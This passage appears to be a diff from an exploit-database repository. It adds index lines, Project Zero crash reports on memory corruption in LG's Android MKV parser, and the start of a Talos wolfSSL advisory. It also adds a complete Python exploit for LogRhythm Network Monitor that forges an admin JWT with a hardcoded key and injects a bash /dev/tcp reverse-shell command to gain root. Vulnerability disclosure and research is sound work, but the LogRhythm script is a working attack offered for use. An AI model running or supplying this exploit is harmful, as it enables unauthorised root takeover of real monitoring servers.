41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
|
||||
|
@ -37821,3 +37828,5 @@ id,file,description,date,author,platform,type,port
|
|||
41963,platforms/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",linux,webapps,0
|
||||
41966,platforms/php/webapps/41966.txt,"WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection",2017-05-05,defensecode,php,webapps,80
|
||||
41967,platforms/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery",2017-05-05,Sysdream,php,webapps,80
|
||||
41976,platforms/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",linux,webapps,0
|
||||
41979,platforms/php/webapps/41979.txt,"I_ Librarian 4.6 / 4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
82
platforms/android/dos/41981.txt
Executable file
82
platforms/android/dos/41981.txt
Executable file
|
@ -0,0 +1,82 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1102
|
||||
|
||||
In both of the following functions
|
||||
mkvparser::AudioTrack::AudioTrack(mkvparser::Segment*, mkvparser::Track::Info const&, long long, long long)
|
||||
mkvparser::VideoTrack::VideoTrack(mkvparser::Segment*, mkvparser::Track::Info const&, long long, long long)
|
||||
|
||||
During EBML node parsing the EBML element_size is used unvalidated to allocate a
|
||||
stack buffer to store the element contents. Since calls to alloca simply compile
|
||||
to a subtraction from the current stack pointer, for large sizes this can result
|
||||
in memory corruption and potential remote-code-execution in the mediaserver
|
||||
process.
|
||||
|
||||
Tested on an LG-G4 with the latest firmware available for my device; MRA58K.
|
||||
|
||||
See attached for crash samples and the original unmodified file.
|
||||
|
||||
(audio_track.mkv)
|
||||
|
||||
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
|
||||
Revision: '11'
|
||||
ABI: 'arm'
|
||||
pid: 16668, tid: 16986, name: pd_session >>> /system/bin/mediaserver <<<
|
||||
AM write failed: Broken pipe
|
||||
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x2e924108
|
||||
r0 c01db33f r1 efd34940 r2 0000022c r3 2e924118
|
||||
r4 f1449d80 r5 eeaff4d0 r6 eeaff470 r7 eeaff458
|
||||
r8 f144f228 r9 00000000 sl 0000022c fp 00000000
|
||||
ip 00000000 sp 2e924108 lr efd2afeb pc efd2b2c0 cpsr 800f0030
|
||||
|
||||
backtrace:
|
||||
#00 pc 000122c0 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser10AudioTrackC1EPNS_7SegmentERKNS_5Track4InfoExx+123)
|
||||
#01 pc 0001247b /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6Tracks15ParseTrackEntryExxRPNS_5TrackExx+222)
|
||||
#02 pc 00012635 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6TracksC1EPNS_7SegmentExxxx+372)
|
||||
#03 pc 000128a9 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment12ParseHeadersEv+552)
|
||||
#04 pc 0000c821 /system/lib/liblg_parser_mkv.so (_ZN12MkvExtractorC1EP11IDataSourceb+132)
|
||||
#05 pc 00009d01 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser4OpenEP11IDataSource+56)
|
||||
#06 pc 000271f9 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorC2ERKNS_2spINS_10DataSourceEEE+200)
|
||||
#07 pc 00022a85 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+68)
|
||||
#08 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
|
||||
#09 pc 0005a209 /system/lib/liblgesourceplugin.so (_ZN7android9PDSession18initFromDataSourceEv+312)
|
||||
#10 pc 0005d1bf /system/lib/liblgesourceplugin.so (_ZN7android9PDSession14onPrepareAsyncEv+490)
|
||||
#11 pc 0005d471 /system/lib/liblgesourceplugin.so (_ZN7android9PDSession17onMessageReceivedERKNS_2spINS_8AMessageEEE+68)
|
||||
#12 pc 0000b309 /system/lib/libstagefright_foundation.so (_ZN7android8AHandler14deliverMessageERKNS_2spINS_8AMessageEEE+16)
|
||||
#13 pc 0000d2ef /system/lib/libstagefright_foundation.so (_ZN7android8AMessage7deliverEv+54)
|
||||
#14 pc 0000bd15 /system/lib/libstagefright_foundation.so (_ZN7android7ALooper4loopEv+224)
|
||||
#15 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
|
||||
#16 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
|
||||
#17 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)
|
||||
|
||||
(video_track.mkv)
|
||||
|
||||
pid: 18217, tid: 18508, name: pd_session >>> /system/bin/mediaserver <<<
|
||||
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x2ae64110
|
||||
r0 c01db33f r1 efd5e940 r2 000001bd r3 00000000
|
||||
AM write failed: Broken pipe
|
||||
r4 eb03f4d0 r5 f1409b40 r6 eb03f470 r7 eb03f460
|
||||
r8 f140f360 r9 2ae64120 sl c01db4fc fp 00000000
|
||||
ip efd5ee80 sp 2ae64110 lr efd54feb pc efd5517a cpsr 800f0030
|
||||
|
||||
backtrace:
|
||||
#00 pc 0001217a /system/lib/liblg_parser_mkv.so (_ZN9mkvparser10VideoTrackC1EPNS_7SegmentERKNS_5Track4InfoExx+113)
|
||||
#01 pc 00012449 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6Tracks15ParseTrackEntryExxRPNS_5TrackExx+172)
|
||||
#02 pc 00012635 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6TracksC1EPNS_7SegmentExxxx+372)
|
||||
#03 pc 000128a9 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment12ParseHeadersEv+552)
|
||||
#04 pc 0000c821 /system/lib/liblg_parser_mkv.so (_ZN12MkvExtractorC1EP11IDataSourceb+132)
|
||||
#05 pc 00009d01 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser4OpenEP11IDataSource+56)
|
||||
#06 pc 000271f9 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorC2ERKNS_2spINS_10DataSourceEEE+200)
|
||||
#07 pc 00022a85 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+68)
|
||||
#08 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
|
||||
#09 pc 0005a209 /system/lib/liblgesourceplugin.so (_ZN7android9PDSession18initFromDataSourceEv+312)
|
||||
#10 pc 0005d1bf /system/lib/liblgesourceplugin.so (_ZN7android9PDSession14onPrepareAsyncEv+490)
|
||||
#11 pc 0005d471 /system/lib/liblgesourceplugin.so (_ZN7android9PDSession17onMessageReceivedERKNS_2spINS_8AMessageEEE+68)
|
||||
#12 pc 0000b309 /system/lib/libstagefright_foundation.so (_ZN7android8AHandler14deliverMessageERKNS_2spINS_8AMessageEEE+16)
|
||||
#13 pc 0000d2ef /system/lib/libstagefright_foundation.so (_ZN7android8AMessage7deliverEv+54)
|
||||
#14 pc 0000bd15 /system/lib/libstagefright_foundation.so (_ZN7android7ALooper4loopEv+224)
|
||||
#15 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
|
||||
#16 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
|
||||
#17 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41981.zip
|
56
platforms/android/dos/41982.txt
Executable file
56
platforms/android/dos/41982.txt
Executable file
|
@ -0,0 +1,56 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1117
|
||||
|
||||
Failure to initialise pointers in mkvparser::Tracks constructor
|
||||
|
||||
The constructor mkvparser::Tracks::Tracks() doesn't handle parsing failures correctly.
|
||||
|
||||
If we look at the function, it makes allocations in two places; the first where it allocates a temporary array, and the second, where we make the allocation of an array of Track* which we will store in the Tracks object. Note that there is no path in the function which can free the second allocation; if the parsing of the Track object fails in the subsequent code these pointers are left uninitialised.
|
||||
|
||||
Subsequent code will then dereference and use the uninitialised pointers. The results of this obviously depend on the state of the heap prior to parsing of the testcase - a commonly occuring crash where a vtable pointer has been read through the bad pointer during destruction of the Tracks object.
|
||||
|
||||
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
|
||||
Revision: '11'
|
||||
ABI: 'arm'
|
||||
pid: 31956, tid: 31904, name: NuPlayerDriver >>> /system/bin/mediaserver <<<
|
||||
signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0xf62c9880
|
||||
r0 eee45000 r1 f62e4b60 r2 f62c9880 r3 eb1c08a0
|
||||
AM write failed: Broken pipe
|
||||
r4 f1859da0 r5 f15ce05c r6 f15ce060 r7 f62c9880
|
||||
r8 fffdfc60 r9 efc3f5f4 sl 6175644e fp f6f50c11
|
||||
ip eb1c0d18 sp efc3f4c0 lr eb1b19b5 pc f62c9880 cpsr a00f0010
|
||||
|
||||
backtrace:
|
||||
#00 pc 00049880 [anon:libc_malloc]
|
||||
#01 pc 0000c9b3 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6TracksD1Ev+34)
|
||||
#02 pc 0000c9cd /system/lib/liblg_parser_mkv.so (_ZN9mkvparser6TracksD0Ev+4)
|
||||
#03 pc 0001150d /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7SegmentD1Ev+60)
|
||||
#04 pc 0000b015 /system/lib/liblg_parser_mkv.so (_ZN12MkvExtractorD1Ev+10)
|
||||
#05 pc 00009449 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser5CloseEv+24)
|
||||
#06 pc 0002739b /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD1Ev+38)
|
||||
#07 pc 00027425 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD0Ev+4)
|
||||
#08 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
|
||||
#09 pc 00027481 /system/lib/libLGParserOSAL.so
|
||||
#10 pc 000274d9 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractor11LGMKVSourceD0Ev+4)
|
||||
#11 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
|
||||
#12 pc 000329bd /system/lib/liblgesourceplugin.so (_ZN7android2spINS_3lge20StreamingBufferQueueEED1Ev+18)
|
||||
#13 pc 0005997d /system/lib/liblgesourceplugin.so (_ZNK7android6VectorINS_2spINS_11MediaSourceEEEE10do_destroyEPvj+12)
|
||||
#14 pc 00010b6d /system/lib/libutils.so (_ZN7android10VectorImpl15release_storageEv+28)
|
||||
#15 pc 00010bd9 /system/lib/libutils.so (_ZN7android10VectorImpl13finish_vectorEv+4)
|
||||
#16 pc 00058cb7 /system/lib/liblgesourceplugin.so
|
||||
#17 pc 0005a695 /system/lib/liblgesourceplugin.so (_ZN7android9PDSessionD1Ev+292)
|
||||
#18 pc 0005a6d9 /system/lib/liblgesourceplugin.so (_ZN7android9PDSessionD0Ev+4)
|
||||
#19 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
|
||||
#20 pc 00057f69 /system/lib/liblgesourceplugin.so (_ZN7android12HTTPPDSource4stopEv+72)
|
||||
#21 pc 0006bc51 /system/lib/libmediaplayerservice.so (_ZN7android8NuPlayer12performResetEv+168)
|
||||
#22 pc 0006b103 /system/lib/libmediaplayerservice.so (_ZN7android8NuPlayer22processDeferredActionsEv+90)
|
||||
#23 pc 00069ca1 /system/lib/libmediaplayerservice.so (_ZN7android8NuPlayer17onMessageReceivedERKNS_2spINS_8AMessageEEE+4944)
|
||||
#24 pc 0000b309 /system/lib/libstagefright_foundation.so (_ZN7android8AHandler14deliverMessageERKNS_2spINS_8AMessageEEE+16)
|
||||
#25 pc 0000d2ef /system/lib/libstagefright_foundation.so (_ZN7android8AMessage7deliverEv+54)
|
||||
#26 pc 0000bd15 /system/lib/libstagefright_foundation.so (_ZN7android7ALooper4loopEv+224)
|
||||
#27 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
|
||||
#28 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
|
||||
#29 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41982.zip
|
133
platforms/android/dos/41983.txt
Executable file
133
platforms/android/dos/41983.txt
Executable file
|
@ -0,0 +1,133 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1124
|
||||
|
||||
There are multiple paths in mkvparser::Block::Block(...) that result in heap buffer overflows. See attached for sample files that trigger the overflow conditions - these will not reliably crash the process, since the overflows are small and don't deterministically corrupt interesting data.
|
||||
|
||||
All offsets correspond to the version of the library I have, with md5sum 6708b7a76313c0a51df34c3cec5a0e0d.
|
||||
|
||||
Attached are crashers for the testcases which repeatedly cause the parsing of the files by the mediaserver process (via binder ipc), which will eventually cause the mediaserver to crash when the corrupted data is used.
|
||||
|
||||
1) (000035.mkv) Writing outside the bounds of a new[0] allocation.
|
||||
|
||||
In mkvparser::Block::Block, there is a call to new[] (0xfd44) with an attacker controlled count. By setting this count to 0, this will be passed by _Znaj/_Znwj as a call to malloc(1). In jemalloc, this will result in a minimum-sized allocation of 8 bytes.
|
||||
|
||||
The result of this new[] call is stored in the mkvparser::Block structure at offset 0x1c, and if we take the path resulting in a call to mkvparser::Block::BlockWithEbml (0xfe50), this function will write into this allocation at an offset of 8, overwriting the dword immediately following the allocation (0xfb54).
|
||||
|
||||
Due to the behaviour of jemalloc, this will be the first dword of another allocation of size 8.
|
||||
|
||||
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
|
||||
Revision: '11'
|
||||
AM write failed: Broken pipe
|
||||
ABI: 'arm'
|
||||
pid: 14682, tid: 14791, name: Binder_2 >>> /system/bin/mediaserver <<<
|
||||
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe3617e2e
|
||||
r0 f153f250 r1 f003f4e8 r2 00000000 r3 e3617e22
|
||||
r4 f003f500 r5 f153f250 r6 f003f4e8 r7 f1a59d58
|
||||
r8 f05008f4 r9 00000000 sl 000003f5 fp f050081c
|
||||
ip f6680e04 sp f05006a0 lr f667800b pc f714f742 cpsr 600f0030
|
||||
|
||||
backtrace:
|
||||
#00 pc 0000e742 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+33)
|
||||
#01 pc 00008007 /system/lib/libLGCodecParserUtils.so (_ZN7android20MediaExtractorHelperD2Ev+22)
|
||||
#02 pc 0000801d /system/lib/libLGCodecParserUtils.so (_ZN7android20MediaExtractorHelperD0Ev+4)
|
||||
#03 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
|
||||
#04 pc 000273f1 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD1Ev+124)
|
||||
#05 pc 00027425 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD0Ev+4)
|
||||
#06 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
|
||||
#07 pc 000d64af /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetrieverD1Ev+118)
|
||||
#08 pc 000d6515 /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetrieverD0Ev+4)
|
||||
#09 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
|
||||
#10 pc 00058ee5 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient10disconnectEv+24)
|
||||
#11 pc 0008e19d /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+72)
|
||||
#12 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
|
||||
#13 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
|
||||
#14 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
|
||||
#15 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
|
||||
#16 pc 00023909 /system/lib/libbinder.so
|
||||
#17 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
|
||||
#18 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
|
||||
#19 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)
|
||||
|
||||
2) (000038.mkv) Writing outside the bounds of a new[16] allocation.
|
||||
|
||||
Following a similar path through the code, but instead letting the count resolve to 1, we get an allocation of size 16. We will then write outside the bounds of this allocation in mkvparser::Block::BlockWithEbml at (0xfbe0).
|
||||
|
||||
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
|
||||
Revision: '11'
|
||||
ABI: 'arm'
|
||||
pid: 16410, tid: 16516, name: Binder_2 >>> /system/bin/mediaserver <<<
|
||||
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x6ec
|
||||
r0 000006ec r1 f06dd3fc r2 00000002 r3 efba11c4
|
||||
AM write failed: Broken pipe
|
||||
r4 00000000 r5 00000800 r6 f19cf6c0 r7 00000800
|
||||
r8 00000000 r9 00000812 sl efba12e0 fp 00001000
|
||||
ip 00000000 sp f06dd410 lr 00000001 pc f6f31cb8 cpsr 200f0030
|
||||
|
||||
backtrace:
|
||||
#00 pc 00093cb8 /system/lib/libstagefright.so (_ZN7android18CallbackDataSource6readAtExPvj+39)
|
||||
#01 pc 00093e97 /system/lib/libstagefright.so (_ZN7android15TinyCacheSource6readAtExPvj+230)
|
||||
#02 pc 000262c9 /system/lib/libLGParserOSAL.so (_ZN19LGDataSourceAdaptor4ReadEPhPm+28)
|
||||
#03 pc 00014737 /system/lib/liblg_parser_mkv.so (_ZN9MkvReader4ReadExlPh+62)
|
||||
#04 pc 0000e1ed /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment17DoLoadClusterInfoERxRlS1_S1_+212)
|
||||
#05 pc 00013c71 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment13DoLoadClusterERxRl+140)
|
||||
#06 pc 00013e43 /system/lib/liblg_parser_mkv.so (_ZN9mkvparser7Segment11LoadClusterERxRl+14)
|
||||
#07 pc 0000aa73 /system/lib/liblg_parser_mkv.so (_ZN13BlockIterator3eosEv+42)
|
||||
#08 pc 0000b16f /system/lib/liblg_parser_mkv.so (_ZN13BlockIterator7advanceEv+66)
|
||||
#09 pc 0000b765 /system/lib/liblg_parser_mkv.so (_ZN8MkvTrackC2EP12MkvExtractorm+164)
|
||||
#10 pc 0000b7d9 /system/lib/liblg_parser_mkv.so (_ZN12MkvExtractor8addTrackEm+24)
|
||||
#11 pc 00009c81 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser8GetTrackEi+8)
|
||||
#12 pc 00009dc1 /system/lib/liblg_parser_mkv.so (_ZN9MKVParser4OpenEP11IDataSource+248)
|
||||
#13 pc 000271f9 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorC2ERKNS_2spINS_10DataSourceEEE+200)
|
||||
#14 pc 00022a85 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+68)
|
||||
#15 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
|
||||
#16 pc 000d66db /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34)
|
||||
#17 pc 000591e3 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82)
|
||||
#18 pc 0008e329 /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468)
|
||||
#19 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
|
||||
#20 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
|
||||
#21 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
|
||||
#22 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
|
||||
#23 pc 00023909 /system/lib/libbinder.so
|
||||
#24 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
|
||||
#25 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
|
||||
#26 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)
|
||||
|
||||
3) (000128.mkv) Writing outside the bounds of a new[1] allocation.
|
||||
|
||||
Similarly to 1) but writing out of bounds at (0xfdd0) without calling through to BlockWithEbml.
|
||||
|
||||
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
|
||||
Revision: '11'
|
||||
ABI: 'arm'
|
||||
pid: 16661, tid: 18181, name: Binder_6 >>> /system/bin/mediaserver <<<
|
||||
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x1ac
|
||||
r0 f134e130 r1 e9a3b0d8 r2 00000000 r3 000001a0
|
||||
AM write failed: Broken pipe
|
||||
r4 e9a3b0f0 r5 f134e130 r6 e9a3b0d8 r7 ef8b94e8
|
||||
r8 ee5bf8f4 r9 00000000 sl 000003f5 fp ee5bf81c
|
||||
ip f61fae04 sp ee5bf6a0 lr f61f200b pc f6cc9742 cpsr 600f0030
|
||||
|
||||
backtrace:
|
||||
#00 pc 0000e742 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+33)
|
||||
#01 pc 00008007 /system/lib/libLGCodecParserUtils.so (_ZN7android20MediaExtractorHelperD2Ev+22)
|
||||
#02 pc 0000801d /system/lib/libLGCodecParserUtils.so (_ZN7android20MediaExtractorHelperD0Ev+4)
|
||||
#03 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
|
||||
#04 pc 000273f1 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD1Ev+124)
|
||||
#05 pc 00027425 /system/lib/libLGParserOSAL.so (_ZN7android14LGMKVExtractorD0Ev+4)
|
||||
#06 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
|
||||
#07 pc 000d64af /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetrieverD1Ev+118)
|
||||
#08 pc 000d6515 /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetrieverD0Ev+4)
|
||||
#09 pc 0000e753 /system/lib/libutils.so (_ZNK7android7RefBase9decStrongEPKv+50)
|
||||
#10 pc 00058ee5 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient10disconnectEv+24)
|
||||
#11 pc 0008e19d /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+72)
|
||||
#12 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
|
||||
#13 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
|
||||
#14 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
|
||||
#15 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
|
||||
#16 pc 00023909 /system/lib/libbinder.so
|
||||
#17 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
|
||||
#18 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
|
||||
#19 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41983.zip
|
54
platforms/linux/webapps/41976.py
Executable file
54
platforms/linux/webapps/41976.py
Executable file
|
@ -0,0 +1,54 @@
|
|||
# Exploit Title: LogRhythm Network Monitor Auth Bypass Root RCE
|
||||
# Public Disclosure Date: 24 Apr 2017
|
||||
# Author: Francesco Oddo
|
||||
# Reference: http://security-assessment.com/files/documents/advisory/Logrhythm-NetMonitor-Advisory.pdf
|
||||
# Software Link: https://logrhythm.com/network-monitor-freemium/
|
||||
# Version: 3.3.2.1061 (latest) or below
|
||||
# Tested On: nm_install_3.3.2.1061.iso with Freemium License (SHA256 7978f84e9fb18e2fae95f77a263801ca89b4767c95154b9ea874032081b02ce1)
|
||||
# Dependencies: `pip install PyJWT`
|
||||
|
||||
import json
|
||||
import requests
|
||||
import argparse
|
||||
import time
|
||||
import jwt
|
||||
|
||||
def forge_jwt(rhost):
|
||||
print "[+] Forging JWT authentication token"
|
||||
key = 'Gluten-free 100% narwhal deserunt polaroid; quinoa keytar asymmetrical slow-carb plaid occaecat nostrud green juice dolor!'
|
||||
|
||||
iat = time.time()
|
||||
exp = iat + 3600;
|
||||
|
||||
body = json.loads('{"iat":1479893930,"exp":1479894830,"data":{"username":"admin","licensed":true,"role":"admin","timeToResetPass":false}}')
|
||||
body["iat"] = int(iat)
|
||||
body["exp"] = int(exp)
|
||||
|
||||
token = jwt.encode(body, key, algorithm='HS512');
|
||||
return token
|
||||
|
||||
def command_inject(rhost, lhost, lport, gwhost, ifname):
|
||||
uri = "https://%s/data/api/configuration/" % rhost
|
||||
json_body = json.loads('{"type":"network","configurations":[{"name":"interface","value":"","isToggle":false},{"name":"method","value":true,"isToggle":true},{"name":"ipAddress","value":"","isToggle":false},{"name":"netMask","value":"255.255.255.0","isToggle":false},{"name":"gateway","value":"","isToggle":false},{"name":"dnsServers","value":"","isToggle":false},{"name":"searchDomains","value":"","isToggle":false}],"diffFields":["dnsServers"]}')
|
||||
payload = ";bash -i >& /dev/tcp/%s/%s 0>&1" % (lhost, lport)
|
||||
json_body["configurations"][0]["value"] = ifname
|
||||
json_body["configurations"][2]["value"] = rhost
|
||||
json_body["configurations"][3]["value"] = payload
|
||||
json_body["configurations"][4]["value"] = gwhost
|
||||
json_body["configurations"][5]["value"] = gwhost
|
||||
jwt = forge_jwt(rhost)
|
||||
auth_header = {'Token': jwt}
|
||||
print "[+] Initiating reverse shell via command injection at %s:%s" % (lhost, lport)
|
||||
requests.post(url=uri, json=json_body, headers=auth_header, verify=False)
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = argparse.ArgumentParser(description='LogRhythm Network Monitor Root Remote Command Execution PoC')
|
||||
parser.add_argument('--rhost', help='RHOST IP address')
|
||||
parser.add_argument('--lhost', help='LHOST IP address')
|
||||
parser.add_argument('--lport', help='LPORT')
|
||||
parser.add_argument('--gwhost', help='Gateway IP address')
|
||||
parser.add_argument('--ifname', help='Target Interface Identifier', default='enp0s3')
|
||||
args = parser.parse_args()
|
||||
|
||||
command_inject(args.rhost, args.lhost, args.lport, args.gwhost, args.ifname)
|
||||
|
141
platforms/multiple/dos/41984.txt
Executable file
141
platforms/multiple/dos/41984.txt
Executable file
|
@ -0,0 +1,141 @@
|
|||
TALOS-2017-0293
|
||||
WOLFSSL LIBRARY X509 CERTIFICATE TEXT PARSING CODE EXECUTION VULNERABILITY
|
||||
MAY 8, 2017
|
||||
CVE-2017-2800
|
||||
|
||||
SUMMARY
|
||||
An exploitable off-by-one write vulnerability exists in the x509 certificate parsing functionality of wolfSSL library versions up to 3.10.2. A specially crafted x509 certificate can cause a single out of bounds byte overwrite resulting in potential certificate validation vulnerabilities, denial of service and possible remote code execution. In order to trigger this vulnerability, the attacker needs to supply a malicious x509 certificate to either server or client application using this library.
|
||||
|
||||
TESTED VERSIONS
|
||||
WolfSSL 3.10.2
|
||||
|
||||
PRODUCT URLS
|
||||
https://www.wolfssl.com
|
||||
|
||||
CVSSV3 SCORE
|
||||
8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
|
||||
CWE
|
||||
CWE-193: Off-by-one Error
|
||||
|
||||
DETAILS
|
||||
WolfSSL, previously CyaSSL, is a lightweight SSL/TLS library targeted for embedded and RTOS environments, primarily because of its small size, speed, portability, and feature set. According to the vendor it is used in wide range of products including industrial control systems, IoT devices, VoIP hardware, routers and more.
|
||||
|
||||
The vulnerability exists in x509 code that deals with string fields in DER certificates. Specifically, when parsing commonName, countryName, localityName, stateName, orgName or orgUnit fields, the function wolfSSL_X509_NAME_get_text_by_NID is used. Its prototype is:
|
||||
|
||||
